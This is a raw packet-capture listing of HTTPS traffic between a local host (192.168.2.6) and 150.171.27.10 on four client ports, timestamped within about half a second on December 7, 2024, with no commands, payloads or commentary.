Dec 7, 2024 10:51:21.898834944 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.900753975 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.900783062 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.900846004 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.900851965 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.900878906 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.900938034 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.901561975 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.901582003 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.901654005 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.901668072 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.901724100 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.915297985 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.915323973 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.915371895 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.915384054 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.915450096 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.915482998 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.916337967 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.916357994 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.916410923 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.916418076 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.916465044 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.916465044 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.918313026 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.918355942 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.918391943 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.918400049 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.918423891 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.918447971 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.921969891 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.921999931 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.922101974 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.922101974 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.922111988 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.922193050 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.929378033 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.929397106 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.929450035 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.929456949 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.929482937 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.929527998 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.930869102 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.930885077 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.930960894 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.930972099 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.931020975 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.935872078 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.935894966 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.935939074 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.935945034 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.935982943 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.936009884 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.944945097 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.944962025 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.945007086 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.945025921 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.945039988 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.945048094 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.945060015 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.945101023 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.945111990 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.945122957 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.945139885 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.945179939 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.948750973 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.948767900 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.948837996 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.948846102 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.948935032 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.952223063 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.952256918 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.952305079 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.952311039 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.952353001 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.952361107 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.964782000 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.964803934 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.964910984 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.964910984 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.964917898 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.965087891 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.989455938 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.989476919 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.989533901 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.989545107 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.989587069 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.989587069 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.058909893 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.058933973 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.059024096 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.059039116 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.059084892 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.060198069 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.060229063 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.060328007 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.060337067 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.060384989 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.060385942 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.061930895 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.061959028 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.062020063 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.062028885 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.062078953 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.062078953 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.070799112 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.070821047 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.070883989 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.070892096 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.070930004 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.070930004 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.071405888 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.071422100 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.071526051 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.071536064 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.071588039 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.073837042 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.073854923 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.074012041 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.074019909 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.074121952 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.075711966 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.075731993 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.075817108 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.075824022 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.075937986 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.081757069 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.081772089 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.081841946 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.081854105 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.081931114 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.085284948 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.085303068 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.085387945 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.085397005 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.085472107 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.086736917 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.086755991 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.086827993 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.086838961 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.086918116 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.089428902 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.089452028 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.089577913 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.089589119 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.089637995 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.093481064 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.093498945 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.093595982 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.093606949 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.093697071 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.098690987 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.098709106 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.098776102 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.098787069 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.098817110 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.098840952 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.100594044 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.100617886 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.100661993 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.100676060 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.100712061 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.100771904 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.101202965 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.101226091 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.101350069 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.101350069 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.101357937 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.101413965 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.105360985 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.105386019 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.105436087 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.105443954 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.105479956 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.105531931 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.111753941 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.111774921 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.111851931 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.111862898 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.111908913 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.114835978 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.114859104 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.114898920 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.114907026 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.114952087 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.114952087 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.115761995 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.115782022 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.115833044 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.115839958 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.115853071 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.115895033 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.116345882 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.116364956 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.116419077 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.116426945 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.116477966 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.124125004 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.124145031 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.124262094 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.124270916 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.124433994 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.127654076 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.127681971 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.127768040 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.127774954 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.127794027 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.127840042 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.128259897 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.128279924 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.128340006 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.128346920 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.128405094 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.129030943 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.129049063 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.129110098 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.129117012 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.129259109 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.137418032 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.137435913 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.137573957 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.137583971 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.137634039 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.138668060 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.138685942 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.138756037 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.138766050 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.138864040 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.141158104 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.141187906 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.141273022 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.141282082 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.141305923 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.141339064 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.141546965 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.141568899 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.141613007 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.141619921 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.141663074 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.141663074 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.148833036 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.148855925 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.148905039 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.148916006 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.148969889 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.148969889 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.154792070 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.154814005 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.154822111 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.154839039 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.154889107 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.154896975 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.154954910 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.154954910 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.154954910 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.154967070 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.154982090 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.155004978 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.251815081 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.251843929 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.251900911 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.251916885 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.251946926 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.251971960 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.253068924 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.253088951 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.253154039 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.253165960 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.253215075 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.253803015 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.253825903 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.253873110 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.253881931 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.253932953 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.253932953 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.257508039 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.257535934 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.257596016 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.257605076 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.257647038 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.257659912 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.261660099 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.261677980 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.261748075 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.261756897 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.261795044 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.263670921 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.263685942 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.263752937 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.263758898 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.263824940 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.263829947 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.263844013 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.263907909 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.263915062 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.263955116 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.268222094 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.268245935 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.268289089 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.268295050 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.268345118 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.270998955 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.271019936 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.271087885 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.271095991 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.271277905 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.271619081 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.271637917 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.271691084 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.271697998 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.271747112 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.273621082 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.273634911 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.273719072 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.273726940 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.273765087 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.278666973 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.278691053 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.278779984 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.278779984 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.278788090 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.279052973 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.280509949 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.280529976 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.280580044 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.280596018 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.280631065 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.280663967 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.280705929 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.280721903 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.280759096 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.280777931 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.280791998 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.280814886 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.282366037 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.282382011 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.282455921 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.282463074 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.282496929 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.287719965 CET	443	49723	150.171.27.10	192.168.2.6
